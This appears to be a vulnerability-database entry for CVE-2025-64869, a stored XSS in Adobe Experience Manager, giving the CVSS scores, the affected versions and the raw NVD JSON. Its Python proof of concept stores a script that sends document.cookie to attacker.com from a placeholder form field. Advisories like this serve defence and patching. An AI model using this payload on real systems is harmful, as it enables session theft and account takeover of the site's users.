Security Vulnerability Report
中文
CVE-2025-64869 CVSS 5.4 MEDIUM

CVE-2025-64869

Published: 2025-12-10 19:16:34
Last Modified: 2025-12-12 17:32:55

Description

Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:* - VULNERABLE
Adobe Experience Manager 6.5.23及更早版本
Adobe Experience Manager 6.5.x所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64869 Adobe Experience Manager Stored XSS PoC # WARNING: This code is for educational and authorized security testing only. # Unauthorized use is illegal and unethical. import requests from urllib.parse import quote # Configuration target_url = "https://vulnerable-aem-server.com" login_url = f"{target_url}/libs/granite/core/content/login.html" exploit_url = f"{target_url}/content/path/to/form/jcr:content" # Malicious XSS payload xss_payload = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>" # Authentication (low-privilege account) credentials = { "j_username": "attacker_low_privilege", "j_password": "password123", "j_validate": "true" } session = requests.Session() # Step 1: Login with low-privilege account login_response = session.post(login_url, data=credentials) if login_response.status_code == 200: print("[+] Successfully authenticated as low-privilege user") # Step 2: Submit form with XSS payload in vulnerable field form_data = { "./fieldName": xss_payload, # Vulnerable field "_charset_": "UTF-8" } exploit_response = session.post(exploit_url, data=form_data) if exploit_response.status_code == 200: print("[+] XSS payload stored successfully") print(f"[+] Payload URL encoded: {quote(xss_payload)}") # Step 3: When victim visits the page, the XSS will be triggered victim_url = f"{exploit_url}.html" print(f"[+] Malicious content will be rendered at: {victim_url}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64869", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:33.810", "lastModified": "2025-12-12T17:32:54.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.24.0", "matchCriteriaId": "0FC0CE20-2AC2-45FB-A7CF-9ADEEBC8B411"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*", "versionEndExcluding": "2025.12.0", "matchCriteriaId": "3326AB8A-7DF7-437C-86B6-58BA768E42E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*", "matchCriteriaId": "852C2582-859F-40DB-96CF-E1274CEECC1F"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}